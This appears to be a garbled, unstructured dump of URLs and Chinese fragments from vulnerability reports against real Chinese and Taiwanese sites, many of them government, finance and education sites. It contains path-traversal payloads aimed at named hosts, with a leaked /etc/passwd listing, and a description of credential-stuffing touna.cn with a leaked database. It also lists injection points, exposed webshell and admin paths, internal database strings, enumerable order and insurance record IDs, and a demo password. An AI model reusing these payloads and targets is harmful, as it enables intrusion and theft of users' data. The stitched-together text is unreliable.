http://hope.sdydf.gov.cn/siteadmin/login.htm http://221.228.17.58/dataImporter/checkdownload?c=9887213060&cn=%E5%AE%9C%E5%85%B4%E5%B8%82%E4%BE%9B%E7%94%B5%E5%85%AC%E5%8F%B8 https://ay.pingan.com http://m.p2p222.com/index.php/user/Login.html http://glodon.com/bin.rar http://glodon.com/p/info_childc http://glodon.com/p/info_childc http://sqlmap.org http://www.glodon.com/en/ http://www.juyoutan.com/ https://m.touna.cn/sign-in.html,此处虽然已经对登陆进行了限制,比如同一用户名连续尝试登陆十来次就需要输入验证码,这能够防止爆破,但未对撞库进行限制,撞库时对密码进行了md5加密,用burpsuite对密码进行一下加密即可,利用泄漏的库只撞了四十来万撞得三十多个有效账号,可在电脑端:https://www.touna.cn/user-login.html登陆,登陆进去里面涉及金钱,虽然手机号码中间四位打码了,但由于之前未对同一密码用户名输入次数进行限制,导致根据密码爆出电话号码,下面的账号密码麻烦管理员审完后打一下码。 com:8087 com:8087 com:8087 https://mail.galaxyasset.com http://pc.ejoboo.com/findpwd http://pc.ejoboo.com/previewResume?resumeId=227451&v=1 http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/csccmise/fckedit//editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/backmanage/fckedit//editor/filemanager/browser/default/connectors/test.html http://**.**.**.**/wbgm/fckedit//editor/filemanager/browser/default/connectors/test.html http://125.35.11.200:8002/console/ http://125.35.11.200:8002/jmxroot/jmxroot.jsp jdbc:oracle:oci:@crosssy"/ http://125.35.11.200/CrossWebApp/ http://125.35.11.201:7001/console/ http://125.35.11.201:7001/jmxroot/jmxroot.jsp www.yuanping.gov.cn整个网站都是注入点 http://www.gxepb.gov.cn/zxjc/login.jsp ftp://124.65.152.122/ https://career.huawei.com/recruitment/servlet/getHeaderInfo https://career.huawei.com/recruitment/servlet/getUserResumeInfo http://friday.sinaapp.com/huawei.html www.egjyc.com.cn http://jr.tuniu.com/ http://www.zhtongshi.com/manage/export/cardInfoQuery.do http://118.114.245.80:1234/ http://www.sodao.com/zone/100542498/catalog http://**.**.**.**/Platform/Login?ReturnUrl=%2fportal%2f http://**.**.**.**:8080/servlet/editput?sid=2&qid=2 http://**.**.**.**:8080/servlet/editput?sid=1&qid=51 http://**.**.**.**:8080/servlet/editput?sid=1&qid=146 http://**.**.**.**:8080/servlet/editput?sid=1&qid=4 http://**.**.**.**:8080/servlet/editput?sid=1&qid=11 http://**.**.**.**:8080/servlet/editput?sid=1&qid=155 http://**.**.**.**:8080/servlet/editput?sid=1&qid=12 http://**.**.**.**:8080/servlet/editput?sid=1&qid=602 http://**.**.**.**:8080/servlet/editput?sid=1&qid=4 http://**.**.**.**:8080/servlet/editput?sid=1&qid=355 http://www.qjwsgaj.gov.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://eyemain.znv.com/wq/login.action http://60.28.205.41:8280/shouji/feedback/main.jsp?plat=all&prod=all&instsrc=all&begintime=2010-07-23&endtime=2015-07-25&orderby=time&asc=0&pn=2805 http://eip.crcchem.com/login/Login.jsp?logintype=1 http://eip.crcchem.com/login/VerifyLogin.jsp http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=hainan http://bdm.psych.ac.cn/peoplelist.php?name=%E6%9D%8E%E7%BA%BE http://bdm.psych.ac.cn/activitylist.php?title=%E8%AF%BE%E9%A2%98%E7%BB%84%E5%9C%A8%E5%9B%BD%E7%A7%91%E5%A4%A7%E6%80%80%E6%9F%94%E6%A0%A1%E5%8C%BA%E6%B4%BB%E5%8A%A8 http://bdm.psych.ac.cn/projectlist.php?title=%E5%9B%BD%E5%AE%B6%E8%87%AA%E7%84%B6%E7%A7%91%E5%AD%A6%E5%9F%BA%E9%87%91%E9%9D%A2%E4%B8%8A%E9%A1%B9%E7%9B%AE%E2%80%9C%E7%AA%81%E5%8F%91%E5%85%AC%E5%85%B1%E4%BA%8B%E4%BB%B6%E5%90%8E%E4%B8%AD%E5%9B%BD%E6%B0%91%E4%BC%97%E7%9A%84%E5%90%8E%E7%BB%A7%E9%A3%8E%E9%99%A9%E5%86%B3%E7%AD%96%E2%80%9D http://bdm.psych.ac.cn/login.php https://m.airchina.com.cn:9061/worklight/apps/services/api/AirChina/iphone/query cn:9061 http://www.bpzykh.com/examStudentView_info.do?action=info&ep_id=1437&es_id=25454 http://www.kakayinzhang.com/index/mainAction.action存在命令执行漏洞 www.gfortune.com.tw http://gra103.aca.ntu.edu.tw/cpt/queryall/default.asp http://www.lbsfj.gov.cn/ http://www.lbsfj.gov.cn/jsp/cmsNews/cmsNewsViewLBSF http://blog.itpub.net/site/login/ http://api.resume.hiall.com.cn/config_global.bak https://113.106.87.87/por/login_psw.csp?rnd=0.5778109325760672 https://ehs.crc.com.cn/aqsc/,用户名处存在SQL注入,用户名处输入 www.dmall.com www.dmall.com/www/ http://m.dmall.com/order/detail/19287851# http://m.dmall.com/order/detail/19287805# http://m.dmall.com/order/detail/19287855# http://m.dmall.com/order/detail/19280568# http://m.dmall.com/order/detail/14000002# http://m.dmall.com/order/detail/15000001# http://m.dmall.com/order/detail/16000001# http://m.dmall.com/order/detail/17000001# http://m.dmall.com/order/detail/18000001# http://m.dmall.com/order/detail/19121234# www.ganji.com http://radio.wanmei.com:8888/WEB-INF/web.xml http://radio.wanmei.com:8888/WEB-INF/applicationContext.xml http://radio.wanmei.com:8888/WEB-INF/jms-config.xml http://radio.wanmei.com:8888/WEB-INF/action-servlet-zhanghua.xml http://edi.panasonic.cn:8088/login.aspx http://220.181.20.114/ https://api.wan.sohu.com/ https://220.181.20.114/ https://vpn.bjchy.gov.cn http://it.crcgas.net/search.aspx?id=a注入点id http://it.crcgas.net/search.aspx?id=a Thuner.app/Contents/MacOS目录下的Thunder文件 http://www.uleapp.com/ https://sslvpn.hebut.edu.cn http://eip.crcchem.com/tools/SWFUpload/upload.jsp http://eip.crcchem.com/tools/SWFUpload/upload.jsp height:20px;BORDER encap:Ethernet A3:51:E2 addr:192.168.100.88 Bcast:192.168.100.255 Mask:255.255.255.0 fea3:51e2/64 Scope:Link MTU:1500 packets:4592364255 packets:5341551626 txqueuelen:1000 http://career.crc.com.cn/hrjob/index.jsp http://www.jishunda.cn/News.asp?xwlb_id=36 https://218.22.39.88:8443/ http://202.110.116.141/zindex.jsp http://yfg.mszq.com/zindex.jsp http://202.110.116.141/.svn/entrie或者http://yfg.mszq.com/.svn/entries http://202.110.116.141/repository/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://wenku.baidu.com/view/181c1308f78a6529647d53ef.html https://222.35.57.109/ https://222.46.120.11/ http://www.ydthlife.com/ http://www.huxiu.com/user/find_passwd http://zjy.gdcost.com/print/examPermitCert.aspx?id=53187 http://kaoshi.china.com/zlzx_new/GetZx.asp?ntypeid=117&typexpd2=kjz&zlzx=article&procity=&qq-pf-to= https://www.hc3cbank.com.tw/labor_new/Default.aspx http://www.chinartc.com:80/dev/downloadman/getDownLoadInfoByType.do?downLoadType=1 http://ticket.gdcd.gov.cn/OrderDetail.aspx?OrderNo=2015060600000665578&Key=e915b112-bfe0-4316-870d-48a47828f310 http://ticket.gdcd.gov.cn/OrderDetail.aspx?OrderNo=2015060600000665579&Key=e915b112-bfe0-4316-870d-48a47828f310%27 http://ticket.gdcd.gov.cn/OrderDetail.aspx?OrderNo=2015060600000665581&Key=e915b112-bfe0-4316-870d-48a47828f310 http://jcy.njgl.gov.cn/zxfw/zxfw/RoutineOrderAction_addOrder.action http://zsb.swpu.edu.cn/phpmyadmin/ http://zsb.swpu.edu.cn/phpMyAdmin、phpinfo.php http://yinghezhong.com/?m=../../../../../../../../../../etc/passwd%00 http://ityw.gxer.net/public/db/gxsmp130528171926.sql http://ityw.gxer.net/ http://houtai.springtour.com/ http://www.bohp.com.cn/pingpai_ny.asp?id=158&cid=89 http://tudou.hiall.com.cn/yll.txt http://218.27.137.242:8080 http://222.177.213.190:8888 http://117.132.15.88:8001 http://221.224.116.210:81 http://221.238.243.237:8000 http://218.27.137.242:8080/Server/CmxcheckuserMachine.php?b=1&a=1%bf http://www.ziyang.gov.cn/public_catalog_ay/t.aspx?i=20110908184151-311371-00-000 http://pub.jian.gov.cn/jxjax/bmgkxx/wfz/fgwj/qtygwj/201209/t20120929_985896.htm http://ymsa.mohurd.gov.cn/ http://sam.pkusz.edu.cn/artion/search.php?search=clnphp1995&langs=cn&key_clnphp=2 http://home.gmw.cn/.svn/entries http://p.gmw.cn/.svn/entries http://www.91student.com/admin/popups/insert_image.html http://www.91student.com/admin/popups/insert_image.html http://www.91student.com/admin/plugins/FullPage/test.html http://www.wx777.com.cn/show/menu/MenuAction!toSmallLogin.action?mId=4 http://eip.crcchem.com/wui/theme/ecology7/page/login.jsp http://221.7.246.44:7001/defaultroot/login.jsp http://ks2.jtzyzg.net/predetection/printOnlyTestCardAction.do?method=printNew&projectId=100000&enrollmentId=188812 http://ks2.jtzyzg.net/predetection/printOnlyTestCardAction.do?method=printNew&projectId=100000&enrollmentId=188813 http://218.28.166.67:7001/console/ http://218.28.166.67:7001/jmxroot/jmxroot.jsp http://202.115.194.40 www.donews.com www.donews.com http://subcompany.crgdpharm.com/ http://subcompany.crgdpharm.com/login_check http://activity.3gsc.com.cn/activity/.svn/entries http://jxfcga.gov.cn/develop.php http://exam.cuit.edu.cn/Ashx/Delete.ashx?_=1433675537288&id=1&action=GUEST http://202.115.194.143 http://202.115.194.143/PsManage/Login.aspx http://wooyun.org/bugs/wooyun-2010-064027 https://222.89.245.67/por/login_psw.csp http://123.59.10.37/info.php http://www.himovie.com/ http://180.153.225.230/ http://202.115.194.105/index.asp http://202.115.194.105/news_veiw.asp?id=126 https://122.224.120.4 http://180.169.48.252/REM2/ www.weifengke.com http://1jiaoshi.com/points/pointsShow.html http://www.scgysf.gov.cn/ http://www.scgysf.gov.cn/gbook_info.asp?gid=2443 http://www.jhun.edu.cn/jdept.asp?dept=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%23%27%40%21%5C http://www.21train.cn/frontaid/Nallinfo.jsp?infortype=2 http://www.21train.cn/support/onlineexam/student/befview.jsp?examid=3259 http://www.21train.cn/Classroom/Nindex.jsp?type=23 http://bpm.zsmz.com:806/print/guaranteeprintshow.aspx?cardid=384343 http://222.221.17.161/asppage/chinese/index.asp?ID=YWRtaW46YWRtaW4= http://www.suguo.com.cn/index_bro_hp.asp?pagno=0&sm=1&title=1 http://www.suguo.com.cn/index_broj.asp?sm=%D7%DF%BD%F8%CB%D5%B9%FB&bz=%CB%D5%B9%FB%BD%E9%C9%DC http://www.suguo.com.cn/index_brom.asp?sm=%BC%D3%C3%CB%D0%C5%CF%A2&bz=%BC%D3%C3%CB%B8%C5%BF%F6 http://www.suguo.com.cn/index_brow.asp?id=3161&bzsm=1 http://www.suning.cn/snsite/console/sn_info.jsp http://www.suning.cn/snsite/sn_user.do?method=editForm&userid=3 data:user=3 http://www.suning.cn/snsite/sn_user.do www.phfund.com.cn/Downloader?filePath=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.pdf root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oracle:x:54321:54321::/home/oracle:/bin/bash weblogic:x:1000:54321::/home/weblogic:/bin/bash http://eip.crcchem.com/login/Login.jsp?logintype=1 https://vpn.fzu.edu.cn/ http://wenku.baidu.com/view/2e025bfd9ec3d5bbfd0a7446.html http://www.chengxianju.com/readnew.php?id=961 http://www.chengxianju.com/vacation_show.php?id=6 http://211.147.149.70/BJMonitor/ www.nffund.com http://www.nffund.com http://219.134.61.11:81/Login.jsp http://api.diandao.org/ios/get_order?token=xxxxxxxxxxxxxxxx&order_id=1231235927303333 http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.cvma.org.cn/EnterpriseList.aspx?type=1 http://www.cvma.org.cn/EnterpriseList.aspx?type=1 http://www.zhaokao.net/column2.jsp?colid=18576&pid=18557 http://www.zhaokao.net/man/pub/default.jsp http://218.75.77.170/zj_web/si/pages/person/index2.html http://www.ssybw.com/news_show.asp?id=124 http://www.ssybw.com/admin/login.asp http://mail.kuaidigroup.com http://gsk.inspur.com/User/LoginInSampleA http://**.**.**/coremail/index.jsp http://**.**.**.**:81/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.cofcoyoucai.com/ http://www.sdjrzs.com/ http://www.crproperty.com.hk/admin http://online.suning.com/console/ http://online.suning.com http://wcfhost.tms.jiuxian.com/ http://www.ulearning.cn/ulearning_web/web!course.do http://www.sxgxbys.com/cxxt/admin/left.asp http://www.sxgxbys.com/cxxt/admin/login.asp http://183.224.40.177:8082/login/CmsSubmit.do http://self.10010.com/axis2/axis2-admin/login http://vip.crvole.com.cn/account/verifyEmail?email= https://gate.chemchina.com/por/login_psw.csp http://www.ylzhzf.gov.cn/ http://**.**.**.**/bugs/wooyun-2015-0120725 https://github.com/joeiren/washu-jk/blob/3187faee0f436e9700eb240c891c9897031ca2d8/wasu-commerce/conf/routes http://www.517na.com/Message/MessageAdd.aspx http://www.517na.com/Message/MessageReply.aspx?id=88581&url=../Message/MessageList.aspx?isSave=save http://m.zhongjiu.cn/ https://xwremote.jfdaily.com/prx/000/http/localhost/ https://xwremote.jfdaily.com/prx/000/http/192.168.91.235:7001/defaultroot/LogonAction.do https://xwremote.jfdaily.com/prx/000/http/192.168.92.135/ https://xwremote.jfdaily.com/prx/000/http/gpphoto.jfdaily.com:9090/systemBase/login.jsp https://xwremote.jfdaily.com/prx/000/http/jfqmt.jfdaily.com/login/login.aspx?color=Blue https://xwremote.jfdaily.com/prx/000/http/nw.jfdaily.com/mail/ShowDetail.asp?deptid=86 http://target/messager/users.data http://202.108.145.86/ https://159.226.115.194/por/login_psw.csp?rnd=39791234848513584 http://www.taishanpic.com http://www.taishanpic.com/TSHBX/PortalContentInfo.aspx?ContentID=dee75e3b-e2e0-40bc-9de9-da16adf96726 http://wap.jjshome.com/wap/login/getPassword http://www.czhome.com.cn/manage/Login.asp http://dafangtour.com/doc/vote_zj/index.php?cata=122 http://xiage.yy.com https://www.shandianjr.com/ http://www.gxhzgjj.com/upload/admin.php http://119.253.55.28/ui/ http://119.253.55.28/ui/mail/PhoneQuery/PhoneQuery.aspx http://www.jjshome.com http://wap.jjshome.com/wap/login/getPassword http://fangjia.southmoney.com/ https://**.**.**.**/s?wd=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&pn=90&oq=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=cd589475000136eb&rsv_t=6536L0edwIYegCm8E7xqTjRKV5t%2FUJCmOEejo5UYpxAoXJlE0OiUhTvOybB4v22%2Feuim http://**.**.**.**/webs/download.action?path=WEB-INF/web.xml http://**.**.**.**/webs/download.action?path=/WEB-INF/classes/applicationContext.xml http://123.125.112.93 http://123.125.115.42/icbcrawl/icp/icpInfo.action http://1.193.7.244:85/ https://vpn.topsec.com.cn http://sendcloud.sohu.com/ http://sendcloud.sohu.com/doc/test/webhook.html http://220.191.210.72/spcf/index.jsp http://58.241.15.17/ http://219.139.130.116:9060/console/ http://219.139.130.116:9060/gjjnbs/login.action shell:http://219.139.130.116:9060/jmxroot/jmxroot.jsp jdbc:oracle:thin:@127.0.0.1:1521:gjjnbsdb http://pay.test.51wan.com/.svn/entries http://event21.wanmei.com/shenmo/201108/knight/artical-1.jsp?id=1 ftp://www.ap88.com/ http://xcd.517na.com/login.aspx http://www.qzgaj.gov.cn/qzgaj123/index.asp http://www.qzgaj.gov.cn/jjmail/admin/ http://m.zhongjiu.cn http://210.22.96.81:89/Individual/Content/MyHistoryOrder.aspx http://210.22.96.81:89/TicketDetail.aspx?barCode=000157532229&code=80015WEB01O000157532 http://221.226.149.17:8080/kingdee/cash/tree/get_mail.jsp?node=1 http://221.226.149.17:8080/kingdee/cash/tree/get_flow.jsp?ids=1&flow_name=a http://221.226.149.17:8080/kingdee/cash/tree/get_mail_value.jsp?ids=1 http://221.226.149.17:8080/kingdee/cash/tree/get_flow_class.jsp?file_type=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://www.lppz.com http://www.lppz.com/member/profile/update.jhtml http://www.ganji.com/vip/my_message_list.php?source=chatmessage http://static.wooyun.org/wooyun/upload/201504/1511030912d450a7e8775bec6ef6e93fc4dbccdd.png www.tuodong.com:8789 http://218.57.146.178/cwbase/BIAppCenter/BIModel/BIModelDetail.aspx?ID=ff08e987-c1cb-4de8-b48a-5476cee5a0c0&BIVersion=BI6.0&DBType=0%20%20&Version=1.0 http://www.wdmcake.cn/user.php?act=edit_address&id=188475 http://www.wdmcake.cn/user.php?act=edit_address&id=1 http://www.wdmcake.cn/user.php?act=edit_address&id=2 http://www.wdmcake.cn/user.php?act=edit_address&id=3 http://www.wdmcake.cn/user.php?act=edit_address&id=4 http://www.wdmcake.cn/user.php?act=edit_address&id=5 http://www.wdmcake.cn/user.php?act=edit_address&id=6 http://www.wdmcake.cn/user.php?act=edit_address&id=188480 http://jz.eptime.cn/demo/index.asp?action=login http://jz.eptime.cn/demo/admin_upfile.asp?path=images/bg/../../../ http://www.eboly.com/info.php http://www.eboly.com/Public/Js/kindeditor-4.1.6/php/file_manager_json.php?dir=file&path=/var/www/phproot/eboly/ http://qz.89898989.com/product/order.html?person=1&productid=127*&visatype= http://www.csrzj.com.cn/news_detail.asp?id=24 http://www.csrzj.com.cn/manager/AdminLogin.asp http://222.247.56.19/manager/admin/login.do http://222.247.56.19/manager/data.jsp http://b2b.zhairport.com/upfile_flash.asp http://b2b.zhairport.com/diy.asp www.jsnt.lss.gov.cn:7901/console www.jsnt.lss.gov.cn:7901/jmxroot/jmxroot.jsp jdbc:oracle:thin:@192.168.200.10:1521/ntweb http://gj.517na.com/Login/Index http://union.tiantian.com/web.php?m=site&a=site_edit&site_id=150 http://union.tiantian.com http://net.lakala.com/index.php http://vip.11185.cn/findpassword.html http://m.gomaji.com/api/ http://yeqi.hit.edu.cn/jys/View.asp?Cid=95 UltraProcess:UniComm_Others/Default+Admin+View/eid=000000000001150&processid=000000000005622&processtype=AUDITING&cacheid=ff882f56 http://www.bbrcb.cn/ http://www.bbrcb.cn:7001/defaultroot/login.jsp http://60.170.41.219:7001/ http://www.aisile.com/reset_user_password http://118.114.245.86:8081/ http://www.yidagroup.com/admin/ http://wooyun.org/bugs/wooyun-2010-0125053出现过的账号演示,15683401303(密码xiaomi123) https://e-services.hccg.gov.tw/jsp/assortBusines.action http://**.**.**/ygz http://**.**.**/admin-console/ http://www.greatlife.cn/dynamic/EleAnnualReport/annualReportManager.jsp?contno=9025000036338788&year=2015 http://www.greatlife.cn/dynamic/EleAnnualReport/annualReportManager.jsp?contno=9025000036338688&year=2015 http://www.greatlife.cn/dynamic/EleAnnualReport/annualReportManager.jsp?contno=9025000036338588&year=2015 www.lanbaoxian.com) http://xiaobeidai.com/)等多个网站,且共用此mysql,此外目标主机为windows服务器,稍加利用可致使整个服务器沦陷并导致多个网站被恶意控制。 http://kd.517na.com/BuyerLogin www.trunkey.com http://demo.trunkey.com/ http://域名/icpadmin.php?module=admin_icp_input&act=upwebsite&IspWzid=3115 com:88/ www.beianwang.cn www.shceibeian.com www.weidc.net/ www.lwtianchao.com http://**.**.**.**/bugs/wooyun-2015-0129564中多了这样一段URL https://**.**.**.**/s?wd=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&pn=90&oq=inurl%3A%2Fwebs%2Flist%2Fnotice%2F&tn=baiduhome_pg&ie=utf-8&rsv_idx=2&rsv_pq=cd589475000136eb&rsv_t=6536L0edwIYegCm8E7xqTjRKV5t%2FUJCmOEejo5UYpxAoXJlE0OiUhTvOybB4v22%2Feuim http://**.**.**.**/webs/list/notice/810.html http://zxta.dg.gov.cn/dgzx/Common/DownloadFile?path=fileName http://marstv.com/?m=video2&c=index&a=ann&id=5 http://online.suning.com/console/ http://www.1890.gov.cn/upload.jsp http://www.1890.gov.cn/upload/1437903440390@1437903440390.jsp jdbc:oracle:thin:@10.169.165.11:1521:YSFZ www.ganji.com http://www.10jqka.com.cn/includes/includes.tar.gz http://pass.10jqka.com.cn/crossdomain.xml http://pass.10jqka.com.cn/logout?redir=http%3A%2F%2Fwww.baidu.com%2F%3F1437917800.89 http://fund.10jqka.com.cn/zixuan/.svn/entries https://mail.youku.com http://mail.ymt360.com/ http://wechat.youku.com/pay/checkpay/order_id/450* http://luban.baidu.com/index.php?r=other/viewCityVersionMap http://luban.baidu.com/luban/index.php?r=statistics http://luban.baidu.com/luban/index.php?r=statistics/jiesuan http://luban.baidu.com/luban/index.php?r=dataExport/ExportData http://luban.baidu.com/index.php?r=other/ViewCityVersionMapCreate&citycode=168-3 http://luban.baidu.com/index.php?r=other/ViewCityVersionMapByCitycode&citycode=168-2 http://m.changtu.com/user/findPwd.htm http://old.p2p222.com/index.php/ http://old.p2p222.com/index.php/OldData/investment/uid/6466.html http://old.p2p222.com/index.php/OldData/trading/uid/6665.html http://**.**.**.**/about.aspx?cid=aboutus http://**.**.**.**/about.aspx?cid=aboutus http://**.**.**.**/news_details.aspx?ID=403&PID=84 http://**.**.**.**/about.aspx?cid=question http://**.**.**.**/solutionview.aspx?id=132 http://**.**.**.**/about.aspx?cid=gywm http://**.**.**.**/products.aspx?parid=58 http://**.**.**.**/case.htm?page=1 https://account.shfft.com/member/pwd/find passport.m.dangdang.com/login.php?burl=看到触屏版没有https加密协议,也没有验证码的限制 http://union.dangdang.com/user/user/login这个接口,是当当网一个分站的网站登录地址,可以看到登录的地址没有验证码限制 http://xuexiao.ciwong.com/ http://research.ciwong.com/ http://wooyun.org/bugs/wooyun-2015-0119941故此一试,返现春趣商场的订单完成没有做建议或者签名,可以任意修改价格完成支付,再忽悠下客服妹子就可以发货了。 http://weiluyi.m.ciwong.com https://github.com/search?utf8=%E2%9C%93&q=user%3AjackShan+PeccancyInfo&type=Code&ref=searchresults http://183.63.133.158:8081 http://183.63.133.158:8081/Resource/SysUser/query http://pay.lianzhong.com http://60.190.2.183/standard/reg/nosecuritycheck/createUserInit.xhtml?standardType= http://www.sdkjrz.cn/ http://183.62.99.137:81/Web1800/Service/AutoLogin.aspx?GpId=&ClientType=iscompact&Version=&id=8080152&bgColor=&ud= http://www.tp-linkshop.com.cn/account/resetpassword http://www.tp-linkshop.com.cn:80/Account/SetPassword?type=1&id=【邮箱】&key=【key】 http://www.tp-linkshop.com.cn/Account/SetPassword?type=2&key=【key】&id=【手机】 http://www.tp-linkshop.com.cn/Account/ResetPassword https://appstore.crc.com.cn/appstore/toIpadIndex.do集团移动应用商城 http://**.**.**/wljkpt/login2.aspx http://stream-auth.bbn.com.cn/user/account/ http://stream-auth.bbn.com.cn/common/sqlPlus.jsp inurl:http://www.moootooo.com/app/motor.php?userid= http://www.moootooo.com/app/motor.php?userid=MjQ5NzI=&up_id=MTAwMDI0NzUyNA== http://www.moootooo.com/app/motor.php?userid=NDA2Mjgw&up_id=MTAwMDEzMTg0MA== http://cuc.asiainfo.com/office/optorLogin_toLogin.so http://202.96.124.89:8080/webclient/jsp/login.jspj http://wskh.avicsec.com/m1/login.do http://sj.avicsec.com/m1/login.do http://**.**.**.**/opac/virtual_shelf_lst.php?CLASS_ID=1 http://**.**.**.**/opac/virtual_shelf_lst.php?CLASS_ID=1 http://223.87.19.66:12001/jmad/ http://**.**.**.**/bugs/wooyun-2015-0127780/trace/142fc61301f128c2603b870c014624fa http://**.**.**.**/bugs/wooyun-2015-0128179/trace/e7be2fc128208c912fca0aaf1c0ed8fa http://**.**.**.**/bugs/wooyun-2015-0128674/trace/1d19a9f159b538c3ff50761e9af51b74 http://**.**.**.**/bugs/wooyun-2015-0128961/trace/a57d076a904299648b443214bed5ab62 http://**.**.**.**/bugs/wooyun-2015-0129150/trace/b356566d799cc67db52e78efe713da60 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=1019&subjectid=12399 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=1035&subjectid=12666 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=984&subjectid=10409 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=979&subjectid=7127 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=976&subjectid=8453 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=915&subjectid=10088 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=944&subjectid=10089 http://**.**.**.**/module/newzwgk/viewquan.action?websiteid=969&subjectid=10985 http://**.**.**.**/ylnews/video/videoView.jsp?videoid=3847 http://**.**.**.**/main/video/videoView.jsp?videoid=194 http://**.**.**.**/main/video/videoView.jsp?videoid=378 http://**.**.**.**/main/video/videoView.jsp?videoid=731 http://**.**.**.**/main/video/videoView.jsp?videoid=253 http://15th.300.cn/ce_15th_admin/story?search_button=%e6%90%9c%e7%b4%a2&search_company=1&search_date=01/01/1967&search_name=csomfbsy&search_type=1 http://123.125.XXX.103/menu.jsp http://123.125.XXX.103/reception http://123.125.XXX.103/register.jsp http://123.125.XXX.103/system/index.jsp http://123.125.XXX.103/menu.jsp http://123.125.XXX.103/reception http://123.125.XXX.103/register.jsp http://cms.baofenggame.com:7070/login.bf http://223.87.19.65:10005/cam http://182.140.142.160:8080/login http://www.k76.com/Help/index.html找到小编的QQ2233799326 http://119.191.61.214:9080/ksbm/checkjx.do?xzqh=370700 http://119.191.61.214:9080/wscgs/xwl.do?smid=22&bgid=04&bj=8参数smid和bgid均可注入 www.91student.com http://**.**.**.**/bugs/wooyun-2014-066332 http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://37t.ranknowcn.com/web_q_js/web_js_ajax/lesson.ajax.php?courseType=101 http://www.118114.cq.cn/ www.118114.cq.cn http://ec.vcooline.com/admin/site/wx_settings http://ec.vcooline.com/admin/products/new?micro_shop_category_id=70 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037310_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037311_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037312_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037313_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037314_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037315_1 http://huisuo.aeonlife.com.cn/deputy/showElecertificates.jsp?insuredSn=HS12000000037316_1 http://221.226.149.17:8080/kingdee/cash/tree/get_nodes.jsp?node=1 http://221.226.149.17:8080/kingdee/cash/tree/get_part.jsp?ids=1 http://221.226.149.17:8080/kingdee/cash/tree/get_selected.jsp?ids=1 http://221.226.149.17:8080/kingdee/cash/tree/get_netcom_lower_selected.jsp?ids=1 http://221.226.149.17:8080/kingdee/login/loginpage.jsp http://122.139.60.103:800/kingdee/login/loginpage.jsp http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp http://222.179.238.182:8082/kingdee/login/loginpage2.jsp http://222.134.77.23:8080/kingdee/login/loginpage.jsp http://221.4.245.218:8080/kingdee/login/loginpage.jsp 